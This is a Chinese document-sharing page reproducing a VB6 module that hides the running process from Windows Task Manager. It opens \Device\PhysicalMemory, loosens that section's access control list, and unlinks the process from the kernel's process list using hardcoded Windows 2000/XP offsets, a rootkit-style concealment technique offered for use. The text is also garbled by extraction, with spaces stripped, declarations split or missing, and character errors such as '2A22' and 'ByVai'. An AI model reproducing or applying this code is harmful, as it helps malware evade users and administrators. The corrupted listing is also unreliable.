vb中如何在任务管理器里面隐藏应用程序进程.docx
《vb中如何在任务管理器里面隐藏应用程序进程.docx》由会员分享,可在线阅读,更多相关《vb中如何在任务管理器里面隐藏应用程序进程.docx(11页珍藏版)》请在冰点文库上搜索。
vb中如何在任务管理器里面隐藏应用程序进程
vb中如何在任务管理器里面隐藏应用程序进程
'该模块用于在任务管理器中隐藏进程
PrivateConstSTATUS_INFO_LENGTH_MISMATCH=&HC0000004
PrivateConstSTATUS_ACCESS_DENIED=&HC0000022
PrivateConstSTATUS_INVALID_HANDLE=&HC0000008
PrivateConstERROR_SUCCESS=0&
PrivateConstSECTION_MAP_WRITE=&H2
PrivateConstSECTION_MAP_READ=&H4
PrivateConstREAD_CONTROL=&H20000
PrivateConstWRITE_DAC=&H40000
PrivateConstNO_INHERITANCE=0
PrivateConstDACL_SECURITY_INFORMATION=&H4
PrivateTypeIO_STATUS_BLOCK
StatusAsLong
InformationAsLong
EndType
PrivateTypeUNICODE_STRING
LengthAsInteger
MaximumLengthAsInteger
BufferAsLong
EndType
PrivateConstOBJINHERIT=&H2
&H10
PrivateConstOBJ_PERMANENT
PrivateConstOBJ_EXCLUSIVE=&H20
=&H40
&H200
=&H3F2
PrivateConstOBJ_CASE_INSENSITIVE
PrivateConstOBJ_OPENIF=&H80
PrivateConstOBJ_OPENLINK=&H100
PrivateConstOBJ_KERNEL_HANDLE=
PrivateConstOBJ_VALID_ATTRIBUTES
PrivateTypeOBJECT_ATTRIBUTES
LengthAsLong
RootDirectoryAsLong
ObjectNameAsLong
AttributesAsLong
SecurityDeorAsLong
SecurityQualityOfServiceAsLong
EndType
PrivateTypeACL
AclRevisionAsByte
Sbz1AsByte
AclSizeAsInteger
AceCountAsInteger
Sbz2AsInteger
EndType
PrivateEnumACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
EndEnum
PrivateEnumMULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
EndEnum
PrivateEnumTRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
EndEnum
PrivateEnumTRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
EndEnum
PrivateTypeTRUSTEE
pMultipleTrusteeAsLong
MultipleTrusteeOperationAsMULTIPLE_TRUSTEE_OPERATION
TrusteeFormAsTRUSTEE_FORM
TrusteeTypeAsTRUSTEE_TYPE
ptstrNameAsString
EndType
PrivateTypeEXPLICIT_ACCESSgrfAccessPermissionsAsLonggrfAccessModeAsACCESS_MODEgrfInheritanceAsLong
TRUSTEEAsTRUSTEE
EndType
PrivateTypeAceArray
List()AsEXPLICIT_ACCESS
EndType
PrivateEnumSE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE=0SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARE
SE_KERNEL_OBJECT
SE_WINDOW_OBJECT
SE_DS_OBJECT
SE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
EndEnum
PrivateDeclareFunctionSetSecuritylnfoLib
"advapi32.dll"(ByValHandleAsLong,ByVal
ObjectTypeAsSE_OBJECT_TYPE
ByValSecurityInfoAsLong
ppsidOwner
AsLong,ppsidGroupAsLong,ppDaclAsAny,ppSaclAsAny)AsLong
ObjectTypeAsSE_OBJECT_TYPE,ByValSecurityInfoAsLong,ppsidOwner
Long
pListOfExplicitEntriesAs
cCountOfExplicitEntriesAsLong
EXPLICIT_ACCESS,ByValOldAclAsLong,NewAclAsLong)AsLong
PrivateDeclareSubBuildExplicitAccessWithNameLib"advapi32.dll"Alias
"BuildExplicitAccessWithNameA"(pExplicitAccessAsEXPLICIT_ACCESS,ByVal
ByValAccessModeAs
pTrusteeNameAsString,ByValAccessPermissionsAsLong
ACCESS_MODE,ByValInheritanceAsLong)
UNICODE_STRING,ByValSourceStringAsLong)
PrivateDeclareFunctionMapViewOfFileLib"kernel32"(ByValhFileMappingObjectAsLong
dwFileOffsetLowAsLong,ByValdwNumberOfBytesToMapAsLong)AsLong
PrivateDeclareFunctionUnmapViewOfFileLib"kernel32"(lpBaseAddressAsAny)AsLong
PrivateDeclareSubCopyMemoryLib"kernel32"Alias"RtlMoveMemory"(DestinationAsAny
SourceAsAny,ByValLengthAsLong)
PrivateDeclareFunctionGetVersionExLib"kernel32"Alias"GetVersionExA"
(IpVersionlnformationAsOSVERSIONINFO)AsLong
PrivateTypeOSVERSIONINFO
dwOSVersionInfoSizeAsLong
dwMajorVersionAsLong
dwMinorVersionAsLong
dwBuildNumberAsLong
dwPlatformIdAsLong
szCSDVersionAsString*128
EndType
PrivateverinfoAsOSVERSIONINFO
Privateg_hNtDLLAsLong
Privateg_pMapPhysicalMemoryAsLong
Privateg_hMPMAsLong
PrivateaByte(3)AsByte
PublicSubHideCurrentProcess()
'在进程列表中隐藏当前应用程序进程
DimthreadAsLong,processAsLong,fwAsLong,bwAsLong
DimlOffsetFlinkAsLong,lOffsetBlinkAsLong,lOffsetPIDAsLong
verinfo.dwOSVersionlnfoSize=Len(verinfo)
If(GetVersionEx(verinfo))<>0Then
Ifverinfo.dwPlatformld=2Then
Ifverinfo.dwMajorVersion=5Then
SelectCaseverinfo.dwMinorVersion
Case0
lOffsetFlink=&HA0
lOffsetBlink=&HA4
lOffsetPID=&H9C
Case1
lOffsetFlink=&H88
lOffsetBlink=&H8C
lOffsetPID=&H84
EndSelect
EndIf
EndIf
EndIf
IfOpenPhysicalMemory<>0Then
thread=GetData(&HFFDFF124)
process=GetData(thread+&H44)
fw=GetData(process+lOffsetFlink)
bw=GetData(process+lOffsetBlink)
SetDatafw+4,bw
SetDatabw,fw
CloseHandleg_hMPM
EndIf
EndSub
PrivateSubSetPhyscialMemorySectionCanBeWrited(ByVaihSectionAsLong)
DimpDaciAsLong
DimpNewDaciAsLong
DimpSDAsLong
DimdwResAsLong
DimeaAsEXPLICIT_ACCESS
GetSecurityInfohSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,pDaci,0,pSD
ea.grfAccessPermissions=SECTION_MAP_WRITE
ea.grfAccessMode=GRANT_ACCESS
ea.grfInheritance=NO_INHERITANCE
ea.TRUSTEE.TrusteeForm=TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType=TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName="CURRENT_USER"&vbNuilChar
SetEntriesInAci1,ea,pDaci,pNewDaci
SetSecurityInfohSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,
ByVaipNewDaci,0
CieanUp:
LocaiFreepSD
LocalFreepNewDacI
EndSub
'转载请注名来自爱软件()阿江编注。
PrivateFunctionOpenPhysicalMemory()AsLong
DimStatusAsLong
DimPhysmemStringAsUNICODE_STRING
DimAttributesAsOBJECT_ATTRIBUTES
RtlInitUnicodeStringPhysmemString,StrPtr("\Device\PhysicalMemory")
Attributes.Length=Len(Attributes)
Attributes.RootDirectory=0
Attributes.ObjectName=VarPtr(PhysmemString)
Attributes.Attributes=0
Attributes.SecurityDeor=0
Attributes.SecurityQualityOfService=0
Status=ZwOpenSection(g_hMPM,SECTION_MAP_READorSECTION_MAP_WRITE
Attributes)
IfStatus=STATUS_ACCESS_DENIEDThen
Status=ZwOpenSection(g_hMPM,READ_CONTROLorWRITE_DAC,Attributes)
SetPhyscialMemorySectionCanBeWritedg_hMPM
CloseHandleg_hMPM
Status=ZwOpenSection(g_hMPM,SECTION_MAP_READorSECTION_MAP_WRITE
Attributes)
EndIf
DimlDirectotyAsLong
If(GetVersionEx(verinfo
))<>0Then
Ifverinfo.dwPlatformld=2Then
Ifverinfo.dwMajorVersion
=5Then
SelectCaseverinfo.dwMinorVersion
Case0
lDirectoty=&H30000
Case1
lDirectoty=&H39000
EndSelect
EndIf
EndIf
EndIf
IfStatus=0Then
g_pMapPhysicalMemory
=MapViewOfFile(g_hMPM,4,0,lDirectoty,&H1000)
Ifg_pMapPhysicalMemory
<>0ThenOpenPhysicalMemory=g_hMPM
EndIf
EndFunction
PrivateFunctionLinearToPhys(BaseAddressAsLong,addrAsLong)AsLong
DimVAddrAsLong,PGDEAsLong,PTEAsLong,PAddrAsLong
DimlTempAsLong
VAddr=addr
CopyMemoryaByte(0),VAddr,4lTemp=Fix(ByteArrToLong(aByte)/(2A22))
PGDE=BaseAddress+ITemp*4
CopyMemoryPGDE,
ByValPGDE,4
If(PGDEAnd1)<>
0Then
lTemp=PGDEAnd
&H80
IflTemp<>0Then
PAddr=(PGDEAnd
&HFFC00000)+(VAddrAnd
&H3FFFFF)
Else
PGDE=MapViewOfFile(g_hMPM,4,0,PGDEAnd
&HFFFFF000,&H1000)
lTemp=(VAddrAnd
&H3FF000)/(2人12)
PTE=PGDE+lTemp
*4
CopyMemoryPTE,ByValPTE,4
If(PTEAnd1)<>0Then
PAddr=(PTEAnd&HFFFFFOOO)+(VAddrAnd&HFFF)
UnmapViewOfFilePGDE
EndIf
EndIf
EndIf
LinearToPhys=PAddr
EndFunction
PrivateFunctionGetData(addrAsLong)AsLong
DimphysAsLong,tmpAsLong,retAsLong
phys=LinearToPhys(g_pMapPhysicalMemory,addr)tmp=MapViewOfFile(g_hMPM,4,0,physAnd&HFFFFF000,&H1000)
Iftmp<>0Then
ret=tmp+((physAnd&HFFF)/(2A2))*4
CopyMemoryret,ByVairet,4
UnmapViewOfFiletmp
GetData=ret
EndIf
EndFunction
PrivateFunctionSetData(ByVaiaddrAsLong,ByVaidataAsLong)AsBoolean
DimphysAsLong,tmpAsLong,xAsLong
phys=LinearToPhys(g_pMapPhysicalMemory,addr)
&H1000)
tmp=MapViewOfFile(g_hMPM,SECTION_MAP_WRITE,0,physAnd&HFFFFF000
Iftmp<>0Then
x=tmp+((physAnd&HFFF)/(2a2))*4
CopyMemoryByValx,data,4
UnmapViewOfFiletmp
SetData=True
EndIf
EndFunction
'转载请注名来自爱软件()阿江编注。
PrivateFunctionByteArrToLong(inByte()AsByte)AsDouble
DimiAsInteger
Fori=0To3
ByteArrToLong=ByteArrToLong+inByte(i)*(&H100ai)
Nexti
EndFunction
升级会员 